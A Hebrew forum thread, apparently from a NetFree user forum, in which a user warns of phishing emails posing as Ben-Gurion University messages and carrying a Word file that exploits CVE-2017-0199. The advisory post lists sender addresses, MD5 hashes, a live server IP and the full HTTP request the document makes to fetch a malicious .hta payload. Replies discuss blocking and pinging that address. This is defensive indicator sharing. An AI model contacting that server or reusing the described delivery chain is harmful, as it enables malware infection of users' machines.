שימו לב! מייל עם וירוס נשלח בשעות האחרונות.



  • שימו לב בשעות האחרונות מתקבלים דיווחים רבים על הודעות מייל שמתקבלות כביכול מגורמים רשמיים כמו אוניברסיטת בן גוריון וכדו' חלקם בעברית וחלקם באנגלית. ההודעות מכילות וירוס חמור שמאפשר לתוקף לשלוט במחשבכם.
    נא נקטו במשנה זהירות בפתיחת הודעות מגורמים לא מוכרים.

    למרות שלא קשור לנטפרי ראיתי צורך ליידע את המשתמשים.

    למשתמשים המנוסים יותר מצו"ב מעט יותר פרטים.
    מכיל אינדיקטורים ראשוניים לזיהוי וחסימה,

    וקטור התקיפה:

    מייל המידע מכתובת המזוהה עם שרת הדוא״ל של אוניברסיטת בן גוריון המכיל צרופה מסוג DOC.

    2 גרסאות למייל הנצפו עד כה:

    גרסא 1:

    שולח :

    arik@bgu.ac.il

    נושא המייל:

    RE:: אישור קבלת מלגה פרטנית - קרן ידע הנדסי אקדמי

    גרסא 2:

    שולח:

    dtripto@bgu.ac.il

    נושא המייל:

    ::NIH cancer research funding opportunities

    שם הקובץ המצורף:

    3.doc

    md5: 1318a321b1afb2934ff20a3fb686ce77

    הקובץ מכיל :

    embedded OLE2 link object אשר ככל הנראה ״נטמע״ בקובץ ה - doc באמצעות ניצול cve 2017-0199 לפרטים נוספים:

    https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199

    פגיעות זו מאפשרת לתוקף להפעיל Visual Basic scriptבאמצעות קובץ וורד המכיל את ה - exploit אשר הקורבן נדרש לפתיחתו.

    לא ידוע על remedy אחר ל exploit המדובר מלבד הpatch של microsoft.

    כאשר המשתמש פותח את הקובץ מתבצעת בקשתhttp ל

    80[.]82.67.42 ומוריד ממנו קובץ בשם test5.hta

    להלן הבקשה:

    "GET /test5.hta HTTP/1.1

    Accept: /

    Accept-Encoding: gzip, deflate

    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

    Host: 80.82.67.42

    Connection: Keep-Alive"

    שימו לב ל - user agent הכללי (יחסית) למרות ששום broswer לא ביצע את הבקשה אלא קובץ ה - doc.

    md5:
    293239948c256f168de06299ffd2845b

    כאשר קובץ ה - hta אחרי להורדת קבצים נוספים מסוג ps1 ו - vb אשר פעולתם נחקרת בימים אילו.

    שימו לב, מכיוון ששרתי המייל של bgu מוגדרים כרגע ברמת סיכון גבוהה יותר, אנו ממליצים לשקול חסימה זמנית של שרתי הדוא״ל של bgu. (כתובות שרתי הדוא״ל לא נמצאות בקובץ האינדיקטורים).
    ........................
    אנטי וירוס ESET בעברית לרכישה אונליין לחץ כאן
    0_1479770461972_אין-לי-אינטרנט-957jpg.jpg



  • @957
    א. ראשית אין צורך בהתנצלות - זה דבר חשוב מאוד שאין שום דרך להרבה משתמשים לדעת עליה. יישר כח.
    ב. ככל שידועים הכתובות, האם נטפרי יכולים לחסום אותם באופן גורף לטובת כל המשתמשים?



  • @יהודי-פשוט בגלל שנטפרי עובדת בשיטה של רשימה לבנה, סביר מאד להניח שהכתובת חסומה.
    עם זאת, ייתכן שהיא פתוחה לפרוטוקולים מסויימים.
    למרות ש @957 דיבר על פרוטוקול HTTP, ולכן רוב הסיכויים שזה חסום בנטפרי.

    אני ניסיתי להיכנס לכתובת הזו, וקיבלתי timeout ארוך מאד.
    (@957 יישר כח על המחשבה שלך [או של מי שכתב והפיץ את הטקסט הזה] שלא שם את כתובת הIP כתיקנה, אלא שם סוגריים מרובעות באמצע)



  • בהמשך יש כן את הכתובת בצורה תיקנית.



  • @למדן-וידען אמר בשימו לב! מייל עם וירוס נשלח בשעות האחרונות.:

    בהמשך יש כן את הכתובת בצורה תיקנית.

    הכתובת השנייה לא מזיקה כשלעצמה אם מישהו ילחץ עליה.
    ........................
    אנטי וירוס ESET בעברית לרכישה אונליין לחץ כאן
    0_1479770461972_אין-לי-אינטרנט-957jpg.jpg



  • @clickone אמר בשימו לב! מייל עם וירוס נשלח בשעות האחרונות.:

    אני ניסיתי להיכנס לכתובת הזו, וקיבלתי timeout ארוך מאד.

    מצד שני לping זה מגיב.
    .......................
    אנטי וירוס ESET בעברית לרכישה אונליין לחץ כאן
    0_1479770461972_אין-לי-אינטרנט-957jpg.jpg



  • @957 פינג זה תגובה שהסרבר פעיל.
    עדיין ייתכן שהשרת HTTP תקוע, או שלא מקבל נתון מסויים שמצפה לו.



  • @957 שלחתי לך שאלה למייל?



  • @יעקב.ק אמר בשימו לב! מייל עם וירוס נשלח בשעות האחרונות.:

    @957 שלחתי לך שאלה למייל?

    אתה מנסה להפעיל עליו לחץ דרך הפורום?
    אני מאמין שהוא רואה את המייל לפני שהוא נכנס לפורום..


התחבר כדי לפרסם תגובה